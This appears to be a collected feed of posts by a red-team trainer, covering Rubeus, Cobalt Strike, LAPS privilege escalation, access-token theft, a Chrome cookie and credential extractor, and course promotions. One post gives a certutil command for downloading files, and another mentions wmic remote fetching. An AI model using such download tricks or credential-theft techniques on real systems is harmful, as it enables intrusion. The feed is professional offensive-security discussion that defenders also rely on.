Found a funny way to detect Rubeus. There's a typo in the process name used when calling LsaRegisterLogonProcess, which shows up in the Windows audit logs. Not sure if that was intentional given the code comment right next to it.
Ok, pinvoke.dev is now live. A simple GitBook of code-generated P/Invoke signatures. Just C# for now, but I may add Rust and a few others in the future.
Using @rogue_kdc's CVE-2019-084 to backdoor the LAPS AdmPwd DLL and get code exec as SYSTEM on each Group Policy update.
Thanks to @_RythmStick for the idea of targeting LAPS for the priv esc.
I think I'm coming to the end of my infosec road. New features like admin protection dropping in Windows and instead of being excited/curious about something new to learn and bypass, I find myself just not remotely interested...
Would there be much interest in a livestream series of how to use Cobalt Strike, aimed at beginners?
Start simple and work up to more advanced tactics.
[BLOG]
I had a series in mind like "Rubeus' Hidden Secrets" or something like that. Basically, highlighting features of the tool that seem less well known. I'm starting off with a basic one for getting crackable hashes from cached service tickets.
rastamouse.me/kerberoasting-…
I wrote a short primer for transitioning from P/Invoke to D/Invoke in offensive tooling.
Shoutout to @TheRealWover
and @FuzzySecrastamouse.me/blog/process-i…
Kinda funny how I did Rust for n00bs and C# for n00bs, then TCM did Rust 101 and now C# 101. I was working on Assembly for n00bs but don't think I'll bother now, TCM can have it.
It's been a day for course releases. I've just published my own new mini-course on Windows Access Tokens.
This walks you through the essentials of enumerating, creating, stealing, modifying, and impersonating access tokens.
training.zeropointsecurity.c…
[BLOG]
Short post on using the Process Inject Kit in Cobalt Strike, which I feel is quite under-utilized based on the projects I've seen online.
offensivedefence.co.uk/posts…
I drafted a janky mind map of Beacon's components and their relationships. Might be able to make it neater if people find it useful. Perhaps we could get this on a desk mat @joehowwolf 😅
Working on this blog post, hopefully I can get it out very soon.
Huge props to @subTee on this one for answering all my noob questions and being generally awesome in every way.
New in Elastic Security 8.4: Native SOAR for the modern SOC gives users the ability to quickly disable network connectivity to infected systems while still allowing responders to investigate. See how it works: go.es.io/3AxAdXo
It seems Defender is now detecting the use of wmic and regsvr32 to grab files remotely. Crazy stuff.
(note: it doesn't even grab the payload, it's detecting what's entered on the cmdline. Even wmic os get /format:"http://blah" is flagged.)
[BLOG]
This post summarises how to tie Cobalt Strike's UDRL, SleepMask, and BeaconGate together for your syscall and call stack spoofing needs.
rastamouse.me/udrl-sleepmask…
Found the best tool ever for C# devs: CSharpRepl. A global dotnet tool that you can integrate into Windows Terminal. Now you have the power of Rosyln to quickly evaluate C# code in just a few seconds. Intellisense, tab completion and syntax highlighting. Simply orgasmic.
Check out my talk from Mystikcon. Five Ways I got Caught before Lunch.
A brief look at commonly used (bad) tradecraft and how to avoid.
piped.video/qIbrozlf2wM
We're all gonna be fucked when companies adopt Windows 11 and Server 2025 properly. RunAsPPL and Credential Guard break so much stuff we take for granted.
Only recently learned that you can use certutil to download files.
certutil -urlcache -split -f http://file.txt c:\somewhere\file.txt
Thanks @_RythmStick for the tip.
Found a funny way to detect Rubeus. There's a typo in the process name used when calling LsaRegisterLogonProcess, which shows up in the Windows audit logs. Not sure if that was intentional given the code comment right next to it.
I am of the opinion that the overall quality of tooling in infosec is quite low. As an industry we don't conform to any coding standards, documentation standards, security standards (ironically), or testing standards. It's pretty amazing that we get on as well as we do.
I got NtCreateUserProcess with PPID spoof and BlockDLLs working in C# (just P/Invoke for now).
Thanks everyone who assisted: @_Kudaes_, @vxunderground, @brian_psu and others. Great community effort 🙂
Wrote another little C# tool with @_RythmStick for extracting cookie and credential data from Chrome.
github.com/rasta-mouse/Cooki…
Hopefully we can add support for other browsers too.
We see RED 😡
With all the new #redteaming scenarios soon arriving on #HackTheBox, you will too! Catering to both beginners and pros, the total 15+ real-world scenarios will help you gain familiarity with attacking #enterprise infrastructures. Learn more: okt.to/ug6f7B
It's my birthday today 🍰, so I'm running a small 5% discount on Red Team Ops. Valid for today only.
The discount code is OLDRASTA.
zeropointsecurity.co.uk/red-…